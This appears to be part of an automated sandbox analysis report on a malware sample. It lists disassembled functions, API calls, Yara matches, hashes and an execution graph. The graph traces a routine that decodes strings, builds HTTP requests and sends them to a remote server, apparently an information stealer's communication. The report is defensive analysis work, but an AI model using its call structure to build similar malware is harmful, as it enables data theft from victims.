                                                      Function 00410EA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: SpinWait
                                                      • String ID: "1@
                                                      • API String ID: 2810355486-1946750398
                                                      • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                      • Instruction ID: 831f923a2072c92010678d56a775824f1839a333889c666af47755f4fbfb12b7
                                                      • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                      • Instruction Fuzzy Hash: 6D01B5315447228FCA359F3AE5193A6BBD0EB01711B14892FE05A83764C6E9DCC2CB48
                                                      Function 046E110F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SpinWait
                                                      • String ID: "1@
                                                      • API String ID: 2810355486-1946750398
                                                      • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                      • Instruction ID: 021eb1d0f9260cddf7cbdba049299cef82a2f2a105985599a90020559c03d5fb
                                                      • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                      • Instruction Fuzzy Hash: 400175356116268BCB259F3BD9186FABBD0EB13721F04852DD05683765E673F841FB40
                                                      Function 004353D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435441
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: String
                                                      • String ID: "1@$LCMapStringEx
                                                      • API String ID: 2568140703-2505316447
                                                      • Opcode ID: 8403778a4b2da834a7d14d0bbbca5a3efa6532753a6940e146b83d5e24f58d75
                                                      • Instruction ID: 3e368ee38987b1e517a12016c66b32b70e54630f408493fbaa1ac851cb3a26ad
                                                      • Opcode Fuzzy Hash: 8403778a4b2da834a7d14d0bbbca5a3efa6532753a6940e146b83d5e24f58d75
                                                      • Instruction Fuzzy Hash: 0C012932540209BBCF066F90DD06EEE7F62EF1C755F148165FE0425161CA7A8931EB89
                                                      Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C56A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ___std_exception_destroy
                                                      • String ID: W(@$ios_base::failbit set
                                                      • API String ID: 4194217158-2439586120
                                                      • Opcode ID: 919d4c0cc113bc0c95a6bb5aa5da4368f78674bedd9ec777fa34cc4700a5dd4c
                                                      • Instruction ID: 7cd8facb47d2de9bc6e3148695225d2c28fa5bb1da43ba588d9d0b3e962b82d4
                                                      • Opcode Fuzzy Hash: 919d4c0cc113bc0c95a6bb5aa5da4368f78674bedd9ec777fa34cc4700a5dd4c
                                                      • Instruction Fuzzy Hash: 28F0BB7260022436D22026567C41B87F7CC8F51714F10443FFD44966C1E6FCA948819C
                                                      Function 046EDC82 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046EDCCA
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046EDCD8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: "1@
                                                      • API String ID: 1687795959-1946750398
                                                      • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                      • Instruction ID: 263d6804b709e982de11bf399f10b19fe5c66a4af40d920b318da69cc8459d5a
                                                      • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                      • Instruction Fuzzy Hash: 1AF0E939B005165BCB04FB5ADC85C6EFBADAF85AA1310007AEA02D7351EBB4FD0586D4
                                                      Function 0043523A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A94A,?,00000055,00000050), ref: 00435284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: DefaultUser
                                                      • String ID: "1@$GetUserDefaultLocaleName
                                                      • API String ID: 3358694519-473441479
                                                      • Opcode ID: d83e5488f2d0401eae8fdb885a6775d9bc5649defacb58d5f05db1f45aae4167
                                                      • Instruction ID: 5afe855fe14338923cc909c516194069f6c05087dd78cefbb7c891671ae781d2
                                                      • Opcode Fuzzy Hash: d83e5488f2d0401eae8fdb885a6775d9bc5649defacb58d5f05db1f45aae4167
                                                      • Instruction Fuzzy Hash: E1F02431A80208B7DB10AF61CC02F9E7F50EB08B50F10406ABD086A291DAB95A209ACD
                                                      Function 00435303 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsValidLocale.KERNEL32(00000000,00430843,00000000,00000001,?,?,00430843,?,?,00430223,?,00000004), ref: 0043534F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: LocaleValid
                                                      • String ID: "1@$IsValidLocaleName
                                                      • API String ID: 1901932003-2242624233
                                                      • Opcode ID: ae59bf1ec493319126bd60c8b327dad94e77b327732cfefd6e564b4f4afb57f8
                                                      • Instruction ID: 43810d42a241301c42746367af4d8702263165da0e6fe74aabd70bb58ff8b0b7
                                                      • Opcode Fuzzy Hash: ae59bf1ec493319126bd60c8b327dad94e77b327732cfefd6e564b4f4afb57f8
                                                      • Instruction Fuzzy Hash: 6AF05930A84608B3D7107F108C0BF9DBB54DB48B12F20403ABD007B281CEF95D11A59D
                                                      Function 004352A1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043254D,-00000020,00000FA0,00000000,00000014,00402857), ref: 004352EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpin
                                                      • String ID: "1@$InitializeCriticalSectionEx
                                                      • API String ID: 2593887523-895698486
                                                      • Opcode ID: 7dc47b02cff7a801a8833727a72b964f8c40c2a4c50fb23b93927a844150c974
                                                      • Instruction ID: 955382fc3f26e777f362d4c5f22a523e1e843e0c58a303d945887c42e937d21c
                                                      • Opcode Fuzzy Hash: 7dc47b02cff7a801a8833727a72b964f8c40c2a4c50fb23b93927a844150c974
                                                      • Instruction Fuzzy Hash: 7CF0B431A40218FBDB116F51DC02D9F7F61EB48B11F10406AFD056A260DE7A4E20EA89
                                                      Function 0044069A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_catch
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3886170330-2084237596
                                                      • Opcode ID: cd16dfaeb4beeb06cf1950504df26367b7e370f205a3e390df572c182ad6d8a4
                                                      • Instruction ID: 3310887d42457db3e36c9d7f794acfaa64143f504ef096225e03ad829b4e8179
                                                      • Opcode Fuzzy Hash: cd16dfaeb4beeb06cf1950504df26367b7e370f205a3e390df572c182ad6d8a4
                                                      • Instruction Fuzzy Hash: 84F0AF30610228CFDB12BF56D10159D3B70AF41B09F8680A7F5005F3A2C77C6D048FAA
                                                      Function 00435075 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Alloc
                                                      • String ID: "1@$FlsAlloc
                                                      • API String ID: 2773662609-1790844355
                                                      • Opcode ID: ba56c54ddb02d717432006c3e9d16a2ce0462ed21875bafb0e47d434c3175fad
                                                      • Instruction ID: 8b0eae546cc32ad1acbff0ffb13529f04d7d226b7b998f6f5c852f004d1498df
                                                      • Opcode Fuzzy Hash: ba56c54ddb02d717432006c3e9d16a2ce0462ed21875bafb0e47d434c3175fad
                                                      • Instruction Fuzzy Hash: A9E05530B81218A7D314AF518C03AAEBB60DB49B11F10007BFC0167280EEBD9E1082CF
                                                      Function 004350CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Free
                                                      • String ID: "1@$FlsFree
                                                      • API String ID: 3978063606-3140462016
                                                      • Opcode ID: 20d26e2a8a2a7e1595337a8906793d01493818dd0c50048df32c9e5cfd81a3f1
                                                      • Instruction ID: 77f0c918036485f60e000ab15e8ffcd13dc0fd62b6771152366d896c33adff89
                                                      • Opcode Fuzzy Hash: 20d26e2a8a2a7e1595337a8906793d01493818dd0c50048df32c9e5cfd81a3f1
                                                      • Instruction Fuzzy Hash: 6CE0E532E40228A7E714BF559C07A6EBB50DB49F15F14017BFE0567281DE794E1096CE
                                                      Function 00429FB5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00429FCA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: try_get_function
                                                      • String ID: "1@$FlsAlloc
                                                      • API String ID: 2742660187-1790844355
                                                      • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                      • Instruction ID: 47b135a0a5eb8c1deda1f5282f309e78cf8f94d673be45248335df9e2a8433e5
                                                      • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                      • Instruction Fuzzy Hash: C4D0C231BC973663D500A7816D02B99BA048701FA3F0100A3FA0CA1281D6994A1046CD
                                                      Function 004212CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212EB
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004212F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: pThreadProxy
                                                      • API String ID: 1687795959-3651400591
                                                      • Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                      • Instruction ID: 0047e6362571caa7eccb13f0a19baa2af223b8af5f370364af5519479fe15fe9
                                                      • Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                      • Instruction Fuzzy Hash: 8CD05B31E0020856D700E7F9D846E4E77A85B10708F50417B7915E7143EB78E508CAAC
                                                      Function 0042AE9A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,W(@,00000000), ref: 0042AF30
                                                      • GetLastError.KERNEL32 ref: 0042AF3E
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF99
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                      • Instruction ID: 71ba5aec0811aae5270c38f54460bdc277a4d2e01a99ee646e81732c4625e14a
                                                      • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                      • Instruction Fuzzy Hash: 56415870700222EFCB219F65E944AABBBA4EF01310F92416BFC59972A0DB7C8C51C75A
                                                      Function 046FB101 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,046D2ABE,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,046D2ABE,00000000), ref: 046FB197
                                                      • GetLastError.KERNEL32 ref: 046FB1A5
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,046D2ABE,00000000), ref: 046FB200
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                      • Instruction ID: b66b2eeaa14fb05aa70915599da255cd045b83599042e126f844dfec510721a0
                                                      • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                      • Instruction Fuzzy Hash: 2D41E631604206AFDF219FE4CC44ABE7BA5EF12B11F144169EAD9AB2A0FB31B901C750

                                                      Execution Graph

                                                      Execution Coverage:4%
                                                      Dynamic/Decrypted Code Coverage:8.3%
                                                      Signature Coverage:12.8%
                                                      Total number of Nodes:1217
                                                      Total number of Limit Nodes:29
                                                      execution_graph 32081 405640 8 API calls 32121 421740 lstrcpy lstrcpy lstrcpy lstrcpy 32000 2c882bc lstrlen lstrcpy strtok_s 32042 40894f RaiseException __CxxThrowException@8 30822 404c50 30823 404c70 30822->30823 30824 404c85 30823->30824 30826 404c7d lstrcpy 30823->30826 30976 404bc0 30824->30976 30826->30824 30827 404c90 30828 404ccc lstrcpy 30827->30828 30829 404cd8 30827->30829 30828->30829 30830 404cff lstrcpy 30829->30830 30831 404d0b 30829->30831 30830->30831 30832 404d2f lstrcpy 30831->30832 30833 404d3b 30831->30833 30832->30833 30834 404d6d lstrcpy 30833->30834 30835 404d79 30833->30835 30834->30835 30836 404da0 lstrcpy 30835->30836 30837 404dac InternetOpenA StrCmpCA 30835->30837 30836->30837 30838 404de0 30837->30838 30839 4054b8 InternetCloseHandle CryptStringToBinaryA 30838->30839 30840 404def 30838->30840 30841 4054e8 LocalAlloc 30839->30841 30858 4055d8 30839->30858 30980 424040 lstrcpy lstrcpy GetSystemTime 30840->30980 30843 4054ff CryptStringToBinaryA 30841->30843 30841->30858 30844 405517 LocalFree 30843->30844 30845 405529 lstrlenA 30843->30845 30844->30858 30846 40553d 30845->30846 30848 405563 lstrlenA 30846->30848 30849 405557 lstrcpy 30846->30849 30847 404dfa 30850 404e23 lstrcpy lstrcatA 30847->30850 30851 404e38 30847->30851 30853 40557d 30848->30853 30849->30848 30850->30851 30852 404e5a lstrcpy 30851->30852 30855 404e62 30851->30855 30852->30855 30854 40558f lstrcpy lstrcatA 30853->30854 30856 4055a2 30853->30856 30854->30856 30857 404e71 lstrlenA 30855->30857 30859 4055d1 30856->30859 30861 4055c9 lstrcpy 30856->30861 30860 404e89 30857->30860 30859->30858 30862 404e95 lstrcpy lstrcatA 30860->30862 30863 404eac 30860->30863 30861->30859 30862->30863 30864 404ed5 30863->30864 30865 404ecd lstrcpy 30863->30865 30866 404edc lstrlenA 30864->30866 30865->30864 30867 404ef2 30866->30867 30868 404efe lstrcpy lstrcatA 30867->30868 30869 404f15 30867->30869 30868->30869 30870 404f36 lstrcpy 30869->30870 30871 404f3e 30869->30871 30870->30871 30872 404f65 lstrcpy lstrcatA 30871->30872 30873 404f7b 30871->30873 30872->30873 30874 404fa4 30873->30874 30875 404f9c lstrcpy 30873->30875 30876 404fab lstrlenA 30874->30876 30875->30874 30877 404fc1 30876->30877 30878 404fcd lstrcpy lstrcatA 30877->30878 30879 404fe4 30877->30879 30878->30879 30880 40500d 30879->30880 30881 405005 lstrcpy 30879->30881 30882 405014 lstrlenA 30880->30882 30881->30880 30883 40502a 30882->30883 30884 405036 lstrcpy lstrcatA 30883->30884 30885 40504d 30883->30885 30884->30885 30886 405079 30885->30886 30887 405071 lstrcpy 30885->30887 30888 405080 lstrlenA 30886->30888 30887->30886 30889 40509b 30888->30889 30890 4050ac lstrcpy lstrcatA 30889->30890 30891 4050bc 30889->30891 30890->30891 30892 4050da lstrcpy lstrcatA 30891->30892 30893 4050ed 30891->30893 30892->30893 30894 40510b lstrcpy 30893->30894 30895 405113 30893->30895 30894->30895 30896 405121 InternetConnectA 30895->30896 30896->30839 30897 405150 HttpOpenRequestA 30896->30897 30898 4054b1 InternetCloseHandle 30897->30898 30899 40518b 30897->30899 30898->30839 30981 427520 lstrlenA lstrcpy lstrcatA 30899->30981 30901 40519b 30982 427490 lstrcpy 30901->30982 30903 4051a4 30983 4274d0 lstrcpy lstrcatA 30903->30983 30905 4051b7 30984 427490 lstrcpy 30905->30984 30907 4051c0 30985 427520 lstrlenA lstrcpy lstrcatA 30907->30985 30909 4051d5 30986 427490 lstrcpy 30909->30986 30911 4051de 30987 427520 lstrlenA lstrcpy lstrcatA 30911->30987 30913 4051f4 30988 427490 lstrcpy 30913->30988 30915 4051fd 30989 427520 lstrlenA lstrcpy lstrcatA 30915->30989 30917 405213 30990 427490 lstrcpy 30917->30990 30919 40521c 30991 427520 lstrlenA lstrcpy lstrcatA 30919->30991 30921 405231 30992 427490 lstrcpy 30921->30992 30923 40523a 30993 4274d0 lstrcpy lstrcatA 30923->30993 30925 40524d 30994 427490 lstrcpy 30925->30994 30927 405256 30995 427520 lstrlenA lstrcpy lstrcatA 30927->30995 30929 40526b 30996 427490 lstrcpy 30929->30996 30931 405274 30997 427520 lstrlenA lstrcpy lstrcatA 30931->30997 30933 405289 30998 427490 lstrcpy 30933->30998 30935 405292 30999 4274d0 lstrcpy lstrcatA 30935->30999 30937 4052a5 31000 427490 lstrcpy 30937->31000 30939 4052ae 31001 427520 lstrlenA lstrcpy lstrcatA 30939->31001 30941 4052c3 31002 427490 lstrcpy 30941->31002 30943 4052cc 31003 427520 lstrlenA lstrcpy lstrcatA 30943->31003 30945 4052e2 31004 427490 lstrcpy 30945->31004 30947 4052eb 31005 427520 lstrlenA lstrcpy lstrcatA 30947->31005 30949 405301 31006 427490 lstrcpy 30949->31006 30951 40530a 31007 427520 lstrlenA lstrcpy lstrcatA 30951->31007 30953 40531f 31008 427490 lstrcpy 30953->31008 30955 405328 31009 4274d0 lstrcpy lstrcatA 30955->31009 30957 40533b 31010 427490 lstrcpy 30957->31010 30959 405344 30960 405370 lstrcpy 30959->30960 30961 40537c 30959->30961 30960->30961 31011 4274d0 lstrcpy lstrcatA 30961->31011 30963 40538a 31012 4274d0 lstrcpy lstrcatA 30963->31012 30965 405397 31013 427490 lstrcpy 30965->31013 30967 4053a1 30968 4053b1 lstrlenA lstrlenA HttpSendRequestA InternetReadFile 30967->30968 30969 40549c InternetCloseHandle 30968->30969 30973 4053f2 30968->30973 30971 4054ae 30969->30971 30970 4053fd lstrlenA 30970->30973 30971->30898 30972 40542e lstrcpy lstrcatA 30972->30973 30973->30969 30973->30970 30973->30972 30974 40546b lstrcpy 30973->30974 30975 40547a InternetReadFile 30973->30975 30974->30973 30975->30969 30975->30973 30977 404bd0 30976->30977 30977->30977 30978 404bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlenA InternetCrackUrlA 30977->30978 30979 404c41 30978->30979 30979->30827 30980->30847 30981->30901 30982->30903 30983->30905 30984->30907 30985->30909 30986->30911 30987->30913 30988->30915 30989->30917 30990->30919 30991->30921 30992->30923 30993->30925 30994->30927 30995->30929 30996->30931 30997->30933 30998->30935 30999->30937 31000->30939 31001->30941 31002->30943 31003->30945 31004->30947 31005->30949 31006->30951 31007->30953 31008->30955 31009->30957 31010->30959 31011->30963 31012->30965 31013->30967 32082 422a50 10 API calls 32083 424250 SHGetFolderPathA lstrcpy 32124 2c799d3 49 API calls 32084 2c887be StrCmpCA strtok_s 32002 2c75ad0 54 API calls 32085 2c934d7 GetSystemPowerStatus 32087 2c988e8 162 API calls 2 library calls 32004 2c78ee0 ??2@YAPAXI RaiseException 32128 2c71dcb 156 API calls 32044 2c883e5 7 API calls 32089 2c920e7 ExitProcess 31014 402e70 31647 404a60 17 API calls 31014->31647 31016 402e82 31017 404a60 34 API calls 31016->31017 31018 402ea0 31017->31018 31019 404a60 34 API calls 31018->31019 31020 402eb6 31019->31020 31021 404a60 34 API calls 31020->31021 31022 402ecb 31021->31022 31023 404a60 34 API calls 31022->31023 31024 402eec 31023->31024 31025 404a60 34 API calls 31024->31025 31026 402f01 31025->31026 31027 404a60 34 API calls 31026->31027 31028 402f19 31027->31028 31029 404a60 34 API calls 31028->31029 31030 402f3a 31029->31030 31031 404a60 34 API calls 31030->31031 31032 402f4f 31031->31032 31033 404a60 34 API calls 31032->31033 31034 402f65 31033->31034 31035 404a60 34 API calls 31034->31035 31036 402f7b 31035->31036 31037 404a60 34 API calls 31036->31037 31038 402f91 31037->31038 31039 404a60 34 API calls 31038->31039 31040 402faa 31039->31040 31041 404a60 34 API calls 31040->31041 31042 402fc0 31041->31042 31043 404a60 34 API calls 31042->31043 31044 402fd6 31043->31044 31045 404a60 34 API calls 31044->31045 31046 402fec 31045->31046 31047 404a60 34 API calls 31046->31047 31048 403002 31047->31048 31049 404a60 34 API calls 31048->31049 31050 403018 31049->31050 31051 404a60 34 API calls 31050->31051 31052 403031 31051->31052 31053 404a60 34 API calls 31052->31053 31054 403047 31053->31054 31055 404a60 34 API calls 31054->31055 31056 40305d 31055->31056 31057 404a60 34 API calls 31056->31057 31058 403073 31057->31058 31059 404a60 34 API calls 31058->31059 31060 403089 31059->31060 31061 404a60 34 API calls 31060->31061 31062 40309f 31061->31062 31063 404a60 34 API calls 31062->31063 31064 4030b8 31063->31064 31065 404a60 34 API calls 31064->31065 31066 4030ce 31065->31066 31067 404a60 34 API calls 31066->31067 31068 4030e4 31067->31068 31069 404a60 34 API calls 31068->31069 31070 4030fa 31069->31070 31071 404a60 34 API calls 31070->31071 31072 403110 31071->31072 31073 404a60 34 API calls 31072->31073 31074 403126 31073->31074 31075 404a60 34 API calls 31074->31075 31076 40313f 31075->31076 31077 404a60 34 API calls 31076->31077 31078 403155 31077->31078 31079 404a60 34 API calls 31078->31079 31080 40316b 31079->31080 31081 404a60 34 API calls 31080->31081 31082 403181 31081->31082 31083 404a60 34 API calls 31082->31083 31084 403197 31083->31084 31085 404a60 34 API calls 31084->31085 31086 4031ad 31085->31086 31087 404a60 34 API calls 31086->31087 31088 4031c6 31087->31088 31089 404a60 34 API calls 31088->31089 31090 4031dc 31089->31090 31091 404a60 34 API calls 31090->31091 31092 4031f2 31091->31092 31093 404a60 34 API calls 31092->31093 31094 403208 31093->31094 31095 404a60 34 API calls 31094->31095 31096 40321e 31095->31096 31097 404a60 34 API calls 31096->31097 31098 403234 31097->31098 31099 404a60 34 API calls 31098->31099 31100 40324d 31099->31100 31101 404a60 34 API calls 31100->31101 31102 403263 31101->31102 31103 404a60 34 API calls 31102->31103 31104 403279 31103->31104 31105 404a60 34 API calls 31104->31105 31106 40328f 31105->31106 31107 404a60 34 API calls 31106->31107 31108 4032a5 31107->31108 31109 404a60 34 API calls 31108->31109 31110 4032bb 31109->31110 31111 404a60 34 API calls 31110->31111 31112 4032d4 31111->31112 31113 404a60 34 API calls 31112->31113 31114 4032ea 31113->31114 31115 404a60 34 API calls 31114->31115 31116 403300 31115->31116 31117 404a60 34 API calls 31116->31117 31118 403316 31117->31118 31119 404a60 34 API calls 31118->31119 31120 40332c 31119->31120 31121 404a60 34 API calls 31120->31121 31122 403342 31121->31122 31123 404a60 34 API calls 31122->31123 31124 40335b 31123->31124 31125 404a60 34 API calls 31124->31125 31126 403371 31125->31126 31127 404a60 34 API calls 31126->31127 31128 403387 31127->31128 31129 404a60 34 API calls 31128->31129 31130 40339d 31129->31130 31131 404a60 34 API calls 31130->31131 31132 4033b3 31131->31132 31133 404a60 34 API calls 31132->31133 31134 4033c9 31133->31134 31135 404a60 34 API calls 31134->31135 31136 4033e2 31135->31136 31137 404a60 34 API calls 31136->31137 31138 4033f8 31137->31138 31139 404a60 34 API calls 31138->31139 31140 40340e 31139->31140 31141 404a60 34 API calls 31140->31141 31142 403424 31141->31142 31143 404a60 34 API calls 31142->31143 31144 40343a 31143->31144 31145 404a60 34 API calls 31144->31145 31146 403450 31145->31146 31147 404a60 34 API calls 31146->31147 31148 403469 31147->31148 31149 404a60 34 API calls 31148->31149 31150 40347f 31149->31150 31151 404a60 34 API calls 31150->31151 31152 403495 31151->31152 31153 404a60 34 API calls 31152->31153 31154 4034ab 31153->31154 31155 404a60 34 API calls 31154->31155 31156 4034c1 31155->31156 31157 404a60 34 API calls 31156->31157 31158 4034d7 31157->31158 31159 404a60 34 API calls 31158->31159 31160 4034f0 31159->31160 31161 404a60 34 API calls 31160->31161 31162 403506 31161->31162 31163 404a60 34 API calls 31162->31163 31164 40351c 31163->31164 31165 404a60 34 API calls 31164->31165 31166 403532 31165->31166 31167 404a60 34 API calls 31166->31167 31168 403548 31167->31168 31169 404a60 34 API calls 31168->31169 31170 40355e 31169->31170 31171 404a60 34 API calls 31170->31171 31172 403577 31171->31172 31173 404a60 34 API calls 31172->31173 31174 40358d 31173->31174 31175 404a60 34 API calls 31174->31175 31176 4035a3 31175->31176 31177 404a60 34 API calls 31176->31177 